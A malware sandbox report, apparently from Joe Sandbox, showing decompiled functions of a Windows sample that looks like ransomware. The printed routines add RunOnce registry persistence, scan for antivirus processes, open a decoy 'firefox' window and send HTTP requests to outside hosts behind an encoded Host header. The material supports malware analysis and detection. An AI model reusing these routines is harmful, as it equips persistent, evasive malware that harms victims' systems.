Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFreelstrcpylstrlenwsprintf
String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$s$t$t$w$w$w$y${USERID}
API String ID: 4033391921-3341315666
Opcode ID: b44854a722a90996bbee49eaa57804c12c282392746c9d9a603446e2a6e209d9
Instruction ID: 48399852ba262d4261cb1468ecee9f5481d674f5d3fcdf085f05790daf7b4427
Opcode Fuzzy Hash: b44854a722a90996bbee49eaa57804c12c282392746c9d9a603446e2a6e209d9
Instruction Fuzzy Hash: 48418F70104381CBD724DF11E56836BBFE2FB81759F50895CF6884B292D7BA858ACF92

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC2960 Relevance: 61.3, APIs: 5, Strings: 30, Instructions: 87
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0FBC2960(WCHAR* __ecx, void* __eflags) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				short _v140;
				WCHAR* _t58;

				_t58 = __ecx;
				_v32 = 0x520050;
				_v28 = 0x440049;
				_push(0x41);
				_v24 = 0x520055;
				_v20 = 0x530041;
				_v16 = 0x4b0048;
				_v12 = 0x41;
				E0FBC8150( &_v32, lstrlenW( &_v32));
				_v140 = 0x4f0053;
				_v136 = 0x540046;
				_v132 = 0x410057;
				_v128 = 0x450052;
				_v124 = 0x4d005c;
				_v120 = 0x630069;
				_v116 = 0x6f0072;
				_v112 = 0x6f0073;
				_v108 = 0x740066;
				_v104 = 0x57005c;
				_v100 = 0x6e0069;
				_v96 = 0x6f0064;
				_v92 = 0x730077;
				_v88 = 0x43005c;
				_v84 = 0x720075;
				_v80 = 0x650072;
				_v76 = 0x74006e;
				_v72 = 0x650056;
				_v68 = 0x730072;
				_v64 = 0x6f0069;
				_v60 = 0x5c006e;
				_v56 = 0x750052;
				_v52 = 0x4f006e;
				_v48 = 0x63006e;
				_v44 = 0x65;
				if(RegCreateKeyExW(0x80000001,  &_v140, 0, 0, 0, 0xf003f, 0,  &_v8, 0) != 0) {
					return 0;
				} else {
					RegSetValueExW(_v8,  &_v32, 0, 1, _t58, lstrlenW(_t58) + _t47);
					asm("sbb esi, esi");
					RegCloseKey(_v8);
					_t39 =  &(_t58[0]); // 0x1
					return _t39;
				}
			}

0x0fbc296b
0x0fbc296d
0x0fbc2979
0x0fbc2980
0x0fbc2984
0x0fbc298c
0x0fbc2993
0x0fbc299a
0x0fbc29a8
0x0fbc29b0
0x0fbc29bd
0x0fbc29c7
0x0fbc29ce
0x0fbc29eb
0x0fbc29f8
0x0fbc29ff
0x0fbc2a06
0x0fbc2a0d
0x0fbc2a14
0x0fbc2a1b
0x0fbc2a22
0x0fbc2a29
0x0fbc2a30
0x0fbc2a37
0x0fbc2a3e
0x0fbc2a45
0x0fbc2a4c
0x0fbc2a53
0x0fbc2a5a
0x0fbc2a61
0x0fbc2a68
0x0fbc2a6f
0x0fbc2a76
0x0fbc2a7d
0x0fbc2a8c
0x0fbc2ac7
0x0fbc2a8e
0x0fbc2aa4
0x0fbc2aaf
0x0fbc2ab1
0x0fbc2ab7
0x0fbc2abf
0x0fbc2abf

APIs

lstrlenW.KERNEL32(00520050,00000041,772D82B0,00000000), ref: 0FBC299D

Part of subcall function 0FBC8150: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FBC816D
Part of subcall function 0FBC8150: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0FBC819B
Part of subcall function 0FBC8150: GetModuleHandleA.KERNEL32(?), ref: 0FBC81EF
Part of subcall function 0FBC8150: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FBC81FD
Part of subcall function 0FBC8150: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FBC820C
Part of subcall function 0FBC8150: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FBC8255
Part of subcall function 0FBC8150: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC8263

RegCreateKeyExW.ADVAPI32(80000001,004F0053,00000000,00000000,00000000,000F003F,00000000,0FBC2C45,00000000), ref: 0FBC2A84
lstrlenW.KERNEL32(00000000), ref: 0FBC2A8F
RegSetValueExW.ADVAPI32(0FBC2C45,00520050,00000000,00000001,00000000,00000000), ref: 0FBC2AA4
RegCloseKey.ADVAPI32(0FBC2C45), ref: 0FBC2AB1

Strings

F, xrefs: 0FBC29BD
R, xrefs: 0FBC2A68
n, xrefs: 0FBC2A6F
\, xrefs: 0FBC2A14
U, xrefs: 0FBC2984
r, xrefs: 0FBC2A3E
w, xrefs: 0FBC2A29
I, xrefs: 0FBC2979
i, xrefs: 0FBC29F8
R, xrefs: 0FBC29CE
n, xrefs: 0FBC2A45
u, xrefs: 0FBC2A37
n, xrefs: 0FBC2A76
e, xrefs: 0FBC2A7D
V, xrefs: 0FBC2A4C
S, xrefs: 0FBC29B0
i, xrefs: 0FBC2A1B
f, xrefs: 0FBC2A0D
P, xrefs: 0FBC296D
r, xrefs: 0FBC29FF
s, xrefs: 0FBC2A06
i, xrefs: 0FBC2A5A
\, xrefs: 0FBC29EB
r, xrefs: 0FBC2A53
H, xrefs: 0FBC2993
\, xrefs: 0FBC2A30
n, xrefs: 0FBC2A61
W, xrefs: 0FBC29C7
A, xrefs: 0FBC298C
d, xrefs: 0FBC2A22

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtuallstrlen$AcquireAddressAllocCloseCreateFreeHandleLibraryLoadModuleProcReleaseValue
String ID: A$F$H$I$P$R$R$S$U$V$W$\$\$\$d$e$f$i$i$i$n$n$n$n$r$r$r$s$u$w
API String ID: 553367697-3791882466
Opcode ID: daab8f6be5f60a1cb8a143eb4b991243d9d0b3fa7b6705fff03eca339e4fb9fb
Instruction ID: 3312de828c1967ff786b6fe7342ac0a7a923fdd67e763452bc476741ef31c526
Opcode Fuzzy Hash: daab8f6be5f60a1cb8a143eb4b991243d9d0b3fa7b6705fff03eca339e4fb9fb
Instruction Fuzzy Hash: 2E31DBB090021DDFEB20CF91E958BEEBFB9FB05709F108159D5187B281D7BA49498F94

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC2D30 Relevance: 54.4, APIs: 19, Strings: 12, Instructions: 137
windowthreadregistryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0FBC2D30() {
				struct _WNDCLASSEXW _v52;
				struct tagMSG _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				short _t42;
				void* _t49;
				void* _t61;
				void* _t62;
				void* _t67;
				void* _t69;
				long _t71;

				_push(_t62);
				_push(_t69);
				_v84.message = 0x6c006b;
				_push(_t67);
				_v84.wParam = 0x660069;
				_v84.lParam = 0x73002e;
				_v84.time = 0x730079;
				_v84.pt = 0;
				_v96 = 0x6c006b;
				_v92 = 0x2e0031;
				_v88 = 0x790073;
				_v84.hwnd = 0x73;
				if(E0FBC2F50( &(_v84.message)) != 0 || E0FBC2F50( &_v96) != 0) {
					L5:
					_v52.cbSize = 0x30;
					_v52.style = 3;
					_v52.lpfnWndProc = E0FBC2C50;
					_v52.cbClsExtra = 0;
					_v52.cbWndExtra = 0;
					_v52.hInstance = GetModuleHandleW(0);
					_v52.hIcon = 0;
					_v52.hCursor = LoadCursorW(0, 0x7f00);
					_v52.hbrBackground = 6;
					_v52.lpszMenuName = 0;
					_v52.lpszClassName = L"win32app";
					_v52.hIconSm = LoadIconW(_v52.hInstance, 0x7f00);
					_t42 = RegisterClassExW( &_v52);
					_push(0);
					if(_t42 != 0) {
						GetModuleHandleW();
						_t71 = CreateWindowExW(0, L"win32app", L"firefox", 0xcf0000, 0x80000000, 0x80000000, 5, 5, 0, 0, GetModuleHandleW(0), 0);
						SetWindowLongW(_t71, 0xfffffff0, 0);
						if(_t71 != 0) {
							ShowWindow(_t71, 5);
							UpdateWindow(_t71);
							_t49 = CreateThread(0, 0, E0FBC2D10, _t71, 0, 0);
							if(_t49 != 0) {
								CloseHandle(_t49);
							}
							if(GetMessageW( &_v84, 0, 0, 0) != 0) {
								do {
									TranslateMessage( &_v84);
								} while (DispatchMessageW( &_v84) != 0xdeadbeef && GetMessageW( &_v84, 0, 0, 0) != 0);
							}
							goto L15;
						}
						ExitThread(_t71);
					}
					ExitThread();
				} else {
					_v84.message = 0x730066;
					_v84.wParam = 0x660064;
					_v84.lParam = 0x2e0077;
					_v84.time = 0x790073;
					_v84.pt = 0x73;
					if(E0FBC2F50( &(_v84.message)) != 0) {
						L15:
						ExitThread(0);
					}
					_t61 = E0FBC30A0(_t62, _t67, _t69);
					if(_t61 != 0) {
						goto L15;
					}
					_push(_t61);
					E0FBC2AD0();
					goto L5;
				}
			}

0x0fbc2d39
0x0fbc2d3a
0x0fbc2d3d
0x0fbc2d45
0x0fbc2d4a
0x0fbc2d52
0x0fbc2d5a
0x0fbc2d62
0x0fbc2d67
0x0fbc2d6f
0x0fbc2d77
0x0fbc2d7f
0x0fbc2d8e
0x0fbc2de9
0x0fbc2df1
0x0fbc2df9
0x0fbc2e01
0x0fbc2e09
0x0fbc2e11
0x0fbc2e22
0x0fbc2e26
0x0fbc2e3d
0x0fbc2e41
0x0fbc2e49
0x0fbc2e51
0x0fbc2e5f
0x0fbc2e68
0x0fbc2e6e
0x0fbc2e73
0x0fbc2e7b
0x0fbc2eaf
0x0fbc2eb4
0x0fbc2ebc
0x0fbc2ec8
0x0fbc2ecf
0x0fbc2ee3
0x0fbc2eeb
0x0fbc2eee
0x0fbc2eee
0x0fbc2f09
0x0fbc2f17
0x0fbc2f1c
0x0fbc2f25
0x0fbc2f17
0x00000000
0x0fbc2f09
0x0fbc2ebf
0x0fbc2ebf
0x0fbc2e75
0x0fbc2d9d
0x0fbc2da1
0x0fbc2da9
0x0fbc2db1
0x0fbc2db9
0x0fbc2dc1
0x0fbc2dd0
0x0fbc2f3d
0x0fbc2f3f
0x0fbc2f3f
0x0fbc2dd6
0x0fbc2ddd
0x00000000
0x00000000
0x0fbc2de3
0x0fbc2de4
0x00000000
0x0fbc2de4

APIs

Part of subcall function 0FBC2F50: EnumDeviceDrivers.PSAPI(?,00000004,?), ref: 0FBC2F74

GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0FBC2E19
LoadCursorW.USER32(00000000,00007F00), ref: 0FBC2E2E
LoadIconW.USER32 ref: 0FBC2E59
RegisterClassExW.USER32 ref: 0FBC2E68
ExitThread.KERNEL32 ref: 0FBC2E75

Part of subcall function 0FBC2F50: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0FBC2F8D

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0FBC2E7B
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00007F00), ref: 0FBC2E81
CreateWindowExW.USER32 ref: 0FBC2EA7
SetWindowLongW.USER32 ref: 0FBC2EB4
ExitThread.KERNEL32 ref: 0FBC2EBF

Part of subcall function 0FBC2F50: EnumDeviceDrivers.PSAPI(00000000,00000000,?), ref: 0FBC2FA8
Part of subcall function 0FBC2F50: GetDeviceDriverBaseNameW.PSAPI(00000000,?,00000400), ref: 0FBC2FCF
Part of subcall function 0FBC2F50: lstrcmpiW.KERNEL32(?,006C006B), ref: 0FBC2FE3
Part of subcall function 0FBC2F50: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC2FFA

ExitThread.KERNEL32 ref: 0FBC2F3F

Part of subcall function 0FBC2AD0: VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 0FBC2AEA
Part of subcall function 0FBC2AD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0FBC2B2C
Part of subcall function 0FBC2AD0: GetTempPathW.KERNEL32(00000100,00000000), ref: 0FBC2B38
Part of subcall function 0FBC2AD0: ExitThread.KERNEL32 ref: 0FBC2C47

ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,00007F00), ref: 0FBC2EC8
UpdateWindow.USER32(00000000), ref: 0FBC2ECF
CreateThread.KERNEL32(00000000,00000000,0FBC2D10,00000000,00000000,00000000), ref: 0FBC2EE3
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0FBC2EEE
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0FBC2F05
TranslateMessage.USER32(?), ref: 0FBC2F1C
DispatchMessageW.USER32 ref: 0FBC2F23
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0FBC2F37

Strings

0, xrefs: 0FBC2DF1
k, xrefs: 0FBC2D67
w, xrefs: 0FBC2DB1
1, xrefs: 0FBC2D6F
win32app, xrefs: 0FBC2E51, 0FBC2EA0
s, xrefs: 0FBC2DC1
s, xrefs: 0FBC2D77
s, xrefs: 0FBC2DB9
d, xrefs: 0FBC2DA9
f, xrefs: 0FBC2DA1
firefox, xrefs: 0FBC2E9B
s, xrefs: 0FBC2D7F

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: Thread$ExitHandleMessageModuleWindow$DeviceVirtual$AllocCreateDriversEnumLoadName$BaseClassCloseCursorDispatchDriverFileFreeIconLongPathRegisterShowTempTranslateUpdatelstrcmpi
String ID: 0$1$d$f$firefox$k$s$s$s$s$w$win32app
API String ID: 3011903443-520298170
Opcode ID: ed88c2f5a33f38a727559b5cb77142c21f5b76153891a592ac0699d4e11b0a9b
Instruction ID: 21492cb9e83d2690790ae35305f32c03e332c1293ba406c63d67eb14601adeda
Opcode Fuzzy Hash: ed88c2f5a33f38a727559b5cb77142c21f5b76153891a592ac0699d4e11b0a9b
Instruction Fuzzy Hash: DA517E70648305AFE3109F629C1DB5B7AE8EF49B55F10045CF684AB1C1D7B8A106CFE6

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC7EF0 Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 131
networkfilememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBC7EF0(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16, void* _a20, intOrPtr _a24, WCHAR* _a36, WCHAR* _a40, long _a44) {
				long _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				short _v68;
				void* _t38;
				void* _t40;
				long _t54;
				long _t59;
				WCHAR* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t67;

				_t64 = __ecx;
				_t38 =  *(__ecx + 4);
				if(_t38 != 0) {
					InternetCloseHandle(_t38);
				}
				E0FBC7CE0(_t64);
				_t40 = InternetConnectW( *(_t64 + 4), _a4, 0x50, 0, 0, 3, 0, 0);
				_t65 = _t40;
				_v12 = 0;
				_v16 = _t65;
				if(_t65 != 0) {
					_t62 = VirtualAlloc(0, 0x2800, 0x3000, 0x40);
					_v20 = _t62;
					wsprintfW(_t62, L"%s", _a8);
					_t63 = HttpOpenRequestW(_t65, _a36, _t62, L"HTTP/1.1", 0, 0, 0x8404f700, 0);
					if(_t63 != 0) {
						_v68 = 0x6f0048;
						_v64 = 0x740073;
						_v60 = 0x20003a;
						_v56 = 0x6f006e;
						_v52 = 0x6f006d;
						_v48 = 0x650072;
						_v44 = 0x610072;
						_v40 = 0x73006e;
						_v36 = 0x6d006f;
						_v32 = 0x63002e;
						_v28 = 0x69006f;
						_v24 = 0x6e;
						if(HttpAddRequestHeadersW(_t63,  &_v68, 0xffffffff, 0) != 0) {
							if(HttpSendRequestW(_t63, _a40, _a44, _a12, _a16) == 0) {
								GetLastError();
							} else {
								_t67 = _a20;
								_t59 = _a24 - 1;
								_a4 = 0;
								if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
									while(1) {
										_t54 = _a4;
										if(_t54 == 0) {
											goto L13;
										}
										 *((char*)(_t54 + _t67)) = 0;
										_a4 = 0;
										_v12 = 1;
										if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
											continue;
										} else {
										}
										goto L13;
									}
								}
							}
						}
					}
					L13:
					InternetCloseHandle(_t63);
					InternetCloseHandle(_v16);
					VirtualFree(_v20, 0, 0x8000);
					return _v12;
				} else {
					return _t40;
				}
			}

0x0fbc7ef8
0x0fbc7efb
0x0fbc7f00
0x0fbc7f03
0x0fbc7f03
0x0fbc7f0b
0x0fbc7f22
0x0fbc7f28
0x0fbc7f2a
0x0fbc7f31
0x0fbc7f36
0x0fbc7f58
0x0fbc7f60
0x0fbc7f63
0x0fbc7f87
0x0fbc7f8b
0x0fbc7f98
0x0fbc7fa1
0x0fbc7fa8
0x0fbc7faf
0x0fbc7fb6
0x0fbc7fbd
0x0fbc7fc4
0x0fbc7fcb
0x0fbc7fd2
0x0fbc7fd9
0x0fbc7fe0
0x0fbc7fe7
0x0fbc7ff6
0x0fbc800d
0x0fbc805c
0x0fbc800f
0x0fbc8015
0x0fbc8018
0x0fbc801d
0x0fbc802c
0x0fbc8030
0x0fbc8030
0x0fbc8035
0x00000000
0x00000000
0x0fbc8037
0x0fbc8042
0x0fbc8049
0x0fbc8058
0x00000000
0x00000000
0x0fbc805a
0x00000000
0x0fbc8058
0x0fbc8030
0x0fbc802c
0x0fbc800d
0x0fbc7ff6
0x0fbc8062
0x0fbc8069
0x0fbc806e
0x0fbc807a
0x0fbc8089
0x0fbc7f3e
0x0fbc7f3e
0x0fbc7f3e

APIs

InternetCloseHandle.WININET(?), ref: 0FBC7F03
InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0FBC7F22
VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000040,?,?,?,?,?,?,?,?,?,0FBC6EE6,ipv4bot.whatismyipaddress.com,0FBCFF10), ref: 0FBC7F4F
wsprintfW.USER32 ref: 0FBC7F63
HttpOpenRequestW.WININET(00000000,?,00000000,HTTP/1.1,00000000,00000000,8404F700,00000000), ref: 0FBC7F81
HttpAddRequestHeadersW.WININET(00000000,?,000000FF,00000000), ref: 0FBC7FEE
HttpSendRequestW.WININET(00000000,00650072,006F006D,00000000,0000006E), ref: 0FBC8005
InternetReadFile.WININET(00000000,0069006F,0063002D,00000000), ref: 0FBC8024
InternetReadFile.WININET(00000000,0069006F,0063002D,00000000), ref: 0FBC8050
GetLastError.KERNEL32 ref: 0FBC805C
InternetCloseHandle.WININET(00000000), ref: 0FBC8069
InternetCloseHandle.WININET(00000000), ref: 0FBC806E
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0FBC6EE6), ref: 0FBC807A

Strings

:, xrefs: 0FBC7FA8
s, xrefs: 0FBC7FA1
n, xrefs: 0FBC7FAF
H, xrefs: 0FBC7F98
n, xrefs: 0FBC7FE7
m, xrefs: 0FBC7FB6
o, xrefs: 0FBC7FE0
HTTP/1.1, xrefs: 0FBC7F77
., xrefs: 0FBC7FD9
o, xrefs: 0FBC7FD2
r, xrefs: 0FBC7FBD
n, xrefs: 0FBC7FCB
r, xrefs: 0FBC7FC4

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttpRequest$FileReadVirtual$AllocConnectErrorFreeHeadersLastOpenSendwsprintf
String ID: .$:$H$HTTP/1.1$m$n$n$n$o$o$r$r$s
API String ID: 3906118045-3956618741
Opcode ID: cca287f17b9e58a7532fa9b13e6d5a9db157a353ce37582465b04d5f390263fc
Instruction ID: 76de8b6fe9d869e398e52449dd241a23ecdcf4a385bd9b69696e27ce40c0a88a
Opcode Fuzzy Hash: cca287f17b9e58a7532fa9b13e6d5a9db157a353ce37582465b04d5f390263fc
Instruction Fuzzy Hash: 65417D30A00208ABEB209F52DC49FEFBFBDEF09B65F104059F904A6281C7B599518FE4

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC7A10 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 150
memorystringprocessCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0FBC7A10(void** _a4, intOrPtr* _a8) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				WCHAR* _v28;
				WCHAR* _v32;
				WCHAR* _v36;
				WCHAR* _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				WCHAR* _v72;
				WCHAR* _v76;
				WCHAR* _v80;
				void* _t46;
				void* _t49;
				WCHAR* _t56;
				void** _t68;
				void* _t75;
				long _t76;
				WCHAR* _t77;
				signed int _t79;
				void* _t83;

				_t46 = VirtualAlloc(0, 0x400, 0x3000, 4);
				_t68 = _a4;
				 *_t68 = _t46;
				_v80 = L"AVP.EXE";
				_v76 = L"ekrn.exe";
				_v72 = L"avgnt.exe";
				_v68 = L"ashDisp.exe";
				_v64 = L"NortonAntiBot.exe";
				_v60 = L"Mcshield.exe";
				_v56 = L"avengine.exe";
				_v52 = L"cmdagent.exe";
				_v48 = L"smc.exe";
				_v44 = L"persfw.exe";
				_v40 = L"pccpfw.exe";
				_v36 = L"fsguiexe.exe";
				_v32 = L"cfp.exe";
				_v28 = L"msmpeng.exe";
				_t75 = VirtualAlloc(0, 4, 0x3000, 4);
				_v24 = _t75;
				if(_t75 == 0) {
					L3:
					return 0;
				} else {
					 *_t75 = 0x22c;
					_t49 = CreateToolhelp32Snapshot(2, 0);
					_v20 = _t49;
					if(_t49 != 0xffffffff) {
						_t79 = 0;
						_push(_t75);
						_v12 = 0;
						_a4 = 0;
						_v16 = 0;
						_v8 = 0;
						if(Process32FirstW(_t49) != 0) {
							L6:
							while(_t79 == 0) {
								_t77 = _t75 + 0x24;
								while(lstrcmpiW( *(_t83 + _t79 * 4 - 0x4c), _t77) != 0) {
									_t79 = _t79 + 1;
									if(_t79 < 0xe) {
										continue;
									} else {
										_t79 = _v8;
									}
									L15:
									_t75 = _v24;
									if(Process32NextW(_v20, _t75) != 0 && GetLastError() != 0x12) {
										goto L6;
									}
									goto L17;
								}
								_push(_t77);
								_push( *_t68);
								_v16 = 1;
								if(_a4 != 0) {
									lstrcatW();
									lstrcatW( *_t68, ",");
								} else {
									lstrcpyW();
									lstrcatW( *_t68, ",");
								}
								_a4 =  &(_a4[0]);
								_v12 = _v12 + lstrlenW(_t77) * 2;
								_t79 =  >  ? 1 : _v8;
								_v8 = _t79;
								goto L15;
							}
							L17:
							if(_v16 != 0) {
								_t56 =  *_t68;
								if( *_t56 != 0) {
									 *((short*)( *_t68 + lstrlenW(_t56) * 2 - 2)) = 0;
								}
							}
							 *_a8 = _v12;
						}
						VirtualFree(_t75, 0, 0x8000);
						CloseHandle(_v20);
						_t76 = _v16;
						if(_t76 == 0) {
							VirtualFree( *_t68, _t76, 0x8000);
						}
						return _t76;
					} else {
						VirtualFree(_t75, 0, 0x8000);
						goto L3;
					}
				}
			}

0x0fbc7a2d
0x0fbc7a2f
0x0fbc7a3d
0x0fbc7a3f
0x0fbc7a46
0x0fbc7a4d
0x0fbc7a54
0x0fbc7a5b
0x0fbc7a62
0x0fbc7a69
0x0fbc7a70
0x0fbc7a77
0x0fbc7a7e
0x0fbc7a85
0x0fbc7a8c
0x0fbc7a93
0x0fbc7a9a
0x0fbc7aa3
0x0fbc7aa5
0x0fbc7aaa
0x0fbc7ad4
0x0fbc7ada
0x0fbc7aac
0x0fbc7ab0
0x0fbc7ab6
0x0fbc7abc
0x0fbc7ac2
0x0fbc7adf
0x0fbc7ae1
0x0fbc7ae3
0x0fbc7ae6
0x0fbc7ae9
0x0fbc7aec
0x0fbc7af7
0x00000000
0x0fbc7b00
0x0fbc7b08
0x0fbc7b10
0x0fbc7b1f
0x0fbc7b23
0x00000000
0x0fbc7b25
0x0fbc7b25
0x0fbc7b25
0x0fbc7b87
0x0fbc7b87
0x0fbc7b96
0x00000000
0x00000000
0x00000000
0x0fbc7b96
0x0fbc7b2e
0x0fbc7b2f
0x0fbc7b31
0x0fbc7b38
0x0fbc7b55
0x0fbc7b5e
0x0fbc7b3a
0x0fbc7b3a
0x0fbc7b47
0x0fbc7b47
0x0fbc7b60
0x0fbc7b7e
0x0fbc7b81
0x0fbc7b84
0x00000000
0x0fbc7b84
0x0fbc7ba7
0x0fbc7bab
0x0fbc7bad
0x0fbc7bb3
0x0fbc7bc0
0x0fbc7bc0
0x0fbc7bb3
0x0fbc7bcb
0x0fbc7bcb
0x0fbc7bdb
0x0fbc7be0
0x0fbc7be6
0x0fbc7beb
0x0fbc7bf5
0x0fbc7bf5
0x0fbc7bff
0x0fbc7ac4
0x0fbc7acc
0x00000000
0x0fbc7acc
0x0fbc7ac2

APIs

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,772966A0,?,76F0C0B0), ref: 0FBC7A2D
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0FBC7AA1
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0FBC7AB6
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC7ACC
Process32FirstW.KERNEL32(00000000,00000000), ref: 0FBC7AEF
lstrcmpiW.KERNEL32(0FBD033C,-00000024), ref: 0FBC7B15
Process32NextW.KERNEL32(?,?), ref: 0FBC7B8E
GetLastError.KERNEL32 ref: 0FBC7B98
lstrlenW.KERNEL32(00000000), ref: 0FBC7BB6
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC7BDB
CloseHandle.KERNEL32(?), ref: 0FBC7BE0
VirtualFree.KERNEL32(?,?,00008000), ref: 0FBC7BF5

Strings

i)w, xrefs: 0FBC7B15

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: Virtual$Free$AllocProcess32$CloseCreateErrorFirstHandleLastNextSnapshotToolhelp32lstrcmpilstrlen
String ID: i)w
API String ID: 2470459410-1280834553
Opcode ID: 00609ae607010b940ed90ab1d5db3889638b4994c3af1a85ebe3b2a3ba4c502e
